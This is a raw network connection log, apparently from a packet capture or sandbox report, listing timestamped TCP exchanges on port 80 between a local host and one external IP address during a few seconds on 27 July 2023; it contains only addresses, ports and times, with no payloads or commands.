Jul 27, 2023 01:36:05.333798885 CEST	50424	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.335041046 CEST	80	50425	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.335150003 CEST	50425	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.335514069 CEST	50425	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.379942894 CEST	80	50425	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.383905888 CEST	80	50425	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.384001970 CEST	50425	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.501395941 CEST	50425	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.502315998 CEST	50426	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.545686960 CEST	80	50425	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.545802116 CEST	50425	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.546963930 CEST	80	50426	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.551095963 CEST	50426	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.557595015 CEST	50426	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.602297068 CEST	80	50426	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.606298923 CEST	80	50426	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.606393099 CEST	50426	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.712322950 CEST	50426	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.713109970 CEST	50427	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.757163048 CEST	80	50426	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.757203102 CEST	80	50427	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.757262945 CEST	50426	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.757307053 CEST	50427	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.759321928 CEST	50427	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.804055929 CEST	80	50427	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.808446884 CEST	80	50427	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.811178923 CEST	50427	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.929482937 CEST	50427	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.931405067 CEST	50428	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.973696947 CEST	80	50427	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.973781109 CEST	50427	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.976161003 CEST	80	50428	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:05.978610039 CEST	50428	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:05.981034040 CEST	50428	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.025939941 CEST	80	50428	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.029838085 CEST	80	50428	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.030174017 CEST	50428	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.135974884 CEST	50428	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.136679888 CEST	50429	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.180717945 CEST	80	50428	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.181123018 CEST	80	50429	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.181128025 CEST	50428	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.181232929 CEST	50429	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.181834936 CEST	50429	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.226473093 CEST	80	50429	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.231075048 CEST	80	50429	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.232688904 CEST	50429	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.338860035 CEST	50429	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.339540005 CEST	50430	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.383630037 CEST	80	50429	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.383783102 CEST	50429	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.384363890 CEST	80	50430	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.384454012 CEST	50430	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.384794950 CEST	50430	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.429775000 CEST	80	50430	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.433453083 CEST	80	50430	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.435080051 CEST	50430	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.549263000 CEST	50430	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.555293083 CEST	50431	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.594536066 CEST	80	50430	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.596466064 CEST	50430	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.599993944 CEST	80	50431	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.600689888 CEST	50431	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.602045059 CEST	50431	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.647317886 CEST	80	50431	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.650234938 CEST	80	50431	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.650893927 CEST	50431	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.757828951 CEST	50431	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.758704901 CEST	50432	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.802308083 CEST	80	50431	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.802587986 CEST	80	50432	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.802697897 CEST	50431	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.802731991 CEST	50432	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.803638935 CEST	50432	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.847645998 CEST	80	50432	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.851582050 CEST	80	50432	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:06.854737997 CEST	50432	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.964958906 CEST	50432	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:06.965822935 CEST	50433	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.009021044 CEST	80	50432	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.009151936 CEST	50432	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.011420965 CEST	80	50433	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.011594057 CEST	50433	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.012154102 CEST	50433	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.056135893 CEST	80	50433	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.061393976 CEST	80	50433	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.061897993 CEST	50433	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.166599035 CEST	50433	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.189732075 CEST	50434	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.210927010 CEST	80	50433	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.213218927 CEST	50433	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.235209942 CEST	80	50434	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.236771107 CEST	50434	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.237179995 CEST	50434	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.281831026 CEST	80	50434	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.285938025 CEST	80	50434	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.286760092 CEST	50434	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.398610115 CEST	50434	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.399465084 CEST	50435	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.444363117 CEST	80	50434	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.444405079 CEST	80	50435	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.444528103 CEST	50434	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.444629908 CEST	50435	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.445719957 CEST	50435	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.490715027 CEST	80	50435	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.494317055 CEST	80	50435	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.494592905 CEST	50435	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.602495909 CEST	50435	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.603203058 CEST	50436	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.647448063 CEST	80	50435	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.647574902 CEST	50435	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.647733927 CEST	80	50436	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.649640083 CEST	50436	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.650537968 CEST	50436	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.695195913 CEST	80	50436	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.698895931 CEST	80	50436	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.699088097 CEST	50436	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.808259964 CEST	50436	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.809139967 CEST	50437	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.853693008 CEST	80	50436	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.853728056 CEST	80	50437	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.853821993 CEST	50436	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.853864908 CEST	50437	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.858002901 CEST	50437	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:07.902205944 CEST	80	50437	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.905812025 CEST	80	50437	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:07.905908108 CEST	50437	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.007905960 CEST	50437	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.008776903 CEST	50438	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.052076101 CEST	80	50437	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.052365065 CEST	50437	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.053471088 CEST	80	50438	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.053751945 CEST	50438	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.054492950 CEST	50438	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.098921061 CEST	80	50438	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.103075981 CEST	80	50438	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.103241920 CEST	50438	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.216623068 CEST	50438	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.217322111 CEST	50439	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.261096954 CEST	80	50438	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.261269093 CEST	50438	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.262595892 CEST	80	50439	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.262710094 CEST	50439	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.264956951 CEST	50439	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.309767962 CEST	80	50439	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.313173056 CEST	80	50439	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.313265085 CEST	50439	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.430293083 CEST	50439	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.439443111 CEST	50440	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.475202084 CEST	80	50439	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.475322962 CEST	50439	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.486552954 CEST	80	50440	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.486747980 CEST	50440	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.487246037 CEST	50440	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.532438040 CEST	80	50440	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.536488056 CEST	80	50440	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.536734104 CEST	50440	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.648542881 CEST	50440	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.649219990 CEST	50441	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.693422079 CEST	80	50440	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.693506002 CEST	80	50441	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.693526030 CEST	50440	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.693608046 CEST	50441	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.694000006 CEST	50441	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.739115000 CEST	80	50441	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.744523048 CEST	80	50441	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.744626999 CEST	50441	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.862682104 CEST	50441	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.863590002 CEST	50442	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.908034086 CEST	80	50441	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.908076048 CEST	80	50442	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.908160925 CEST	50441	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.908225060 CEST	50442	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.909714937 CEST	50442	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:08.953933954 CEST	80	50442	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.958909988 CEST	80	50442	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:08.959084034 CEST	50442	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.073334932 CEST	50442	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.073995113 CEST	50443	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.117674112 CEST	80	50442	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.117795944 CEST	50442	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.118904114 CEST	80	50443	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.119060993 CEST	50443	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.125097036 CEST	50443	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.169979095 CEST	80	50443	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.174734116 CEST	80	50443	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.174874067 CEST	50443	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.288834095 CEST	50443	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.289701939 CEST	50444	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.333689928 CEST	80	50443	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.333899021 CEST	50443	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.334892988 CEST	80	50444	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.335053921 CEST	50444	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.335751057 CEST	50444	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.380218983 CEST	80	50444	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.383230925 CEST	80	50444	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.383321047 CEST	50444	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.492108107 CEST	50444	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.497742891 CEST	50445	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.536858082 CEST	80	50444	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.537096977 CEST	50444	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.542617083 CEST	80	50445	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.542781115 CEST	50445	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.543148994 CEST	50445	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.588236094 CEST	80	50445	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.592861891 CEST	80	50445	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.592967987 CEST	50445	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.711195946 CEST	50445	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.711992979 CEST	50446	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.756134033 CEST	80	50445	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.756243944 CEST	50445	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.756628036 CEST	80	50446	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.756752014 CEST	50446	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.758563042 CEST	50446	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.803298950 CEST	80	50446	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.806938887 CEST	80	50446	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.807136059 CEST	50446	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.915139914 CEST	50446	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.915874004 CEST	50447	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.960292101 CEST	80	50446	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.960511923 CEST	80	50447	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:09.960644960 CEST	50446	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.960695982 CEST	50447	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:09.966010094 CEST	50447	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.010802031 CEST	80	50447	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.014909983 CEST	80	50447	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.015018940 CEST	50447	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.121404886 CEST	50447	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.122267962 CEST	50448	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.166327953 CEST	80	50447	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.166358948 CEST	80	50448	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.166450024 CEST	50447	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.166493893 CEST	50448	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.167145967 CEST	50448	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.211163998 CEST	80	50448	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.214884043 CEST	80	50448	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.215019941 CEST	50448	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.327876091 CEST	50448	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.328511953 CEST	50449	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.372035980 CEST	80	50448	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.372224092 CEST	50448	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.372843981 CEST	80	50449	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.372971058 CEST	50449	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.389134884 CEST	50449	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.433634043 CEST	80	50449	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.437011003 CEST	80	50449	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.437114000 CEST	50449	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.558154106 CEST	50449	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.559175968 CEST	50450	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.602638960 CEST	80	50449	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.602777004 CEST	50449	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.603513956 CEST	80	50450	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.606369019 CEST	50450	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.607127905 CEST	50450	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.651618958 CEST	80	50450	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.655791044 CEST	80	50450	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.657008886 CEST	50450	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.777723074 CEST	50450	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.778537989 CEST	50451	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.822341919 CEST	80	50450	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.822864056 CEST	80	50451	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.822957039 CEST	50450	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.823000908 CEST	50451	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.823321104 CEST	50451	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.867754936 CEST	80	50451	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.871962070 CEST	80	50451	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:10.875577927 CEST	50451	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.993825912 CEST	50451	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:10.994580030 CEST	50452	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.038562059 CEST	80	50451	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.039436102 CEST	50451	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.039654016 CEST	80	50452	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.039913893 CEST	50452	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.045559883 CEST	50452	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.090127945 CEST	80	50452	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.094429970 CEST	80	50452	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.094520092 CEST	50452	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.211903095 CEST	50452	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.212568045 CEST	50453	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.257091045 CEST	80	50452	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.257761955 CEST	80	50453	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.257849932 CEST	50452	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.257891893 CEST	50453	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.259741068 CEST	50453	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.303966045 CEST	80	50453	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.307533026 CEST	80	50453	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.309092045 CEST	50453	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.415028095 CEST	50453	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.417220116 CEST	50454	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.459669113 CEST	80	50453	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.461045027 CEST	50453	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.461838007 CEST	80	50454	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.461970091 CEST	50454	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.462811947 CEST	50454	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.510992050 CEST	80	50454	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.514303923 CEST	80	50454	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.516829967 CEST	50454	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.643016100 CEST	50454	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.643683910 CEST	50455	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.691809893 CEST	80	50454	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.692142963 CEST	50454	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.692195892 CEST	80	50455	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.692302942 CEST	50455	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.692895889 CEST	50455	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.737921000 CEST	80	50455	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.741086960 CEST	80	50455	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.741842985 CEST	50455	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.851316929 CEST	50455	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.851969957 CEST	50456	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.896089077 CEST	80	50456	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.896290064 CEST	50456	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.896604061 CEST	50456	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.896681070 CEST	80	50455	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.896743059 CEST	50455	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:11.940426111 CEST	80	50456	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.944118977 CEST	80	50456	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:11.944210052 CEST	50456	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.054651976 CEST	50456	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.055318117 CEST	50457	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.098810911 CEST	80	50456	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.098927975 CEST	50456	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.099606991 CEST	80	50457	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.099720955 CEST	50457	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.100076914 CEST	50457	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.144347906 CEST	80	50457	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.148327112 CEST	80	50457	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.148436069 CEST	50457	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.258405924 CEST	50457	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.259073973 CEST	50458	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.302897930 CEST	80	50457	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.302999020 CEST	50457	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.303596020 CEST	80	50458	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.303719044 CEST	50458	80	192.168.2.5	77.91.68.61
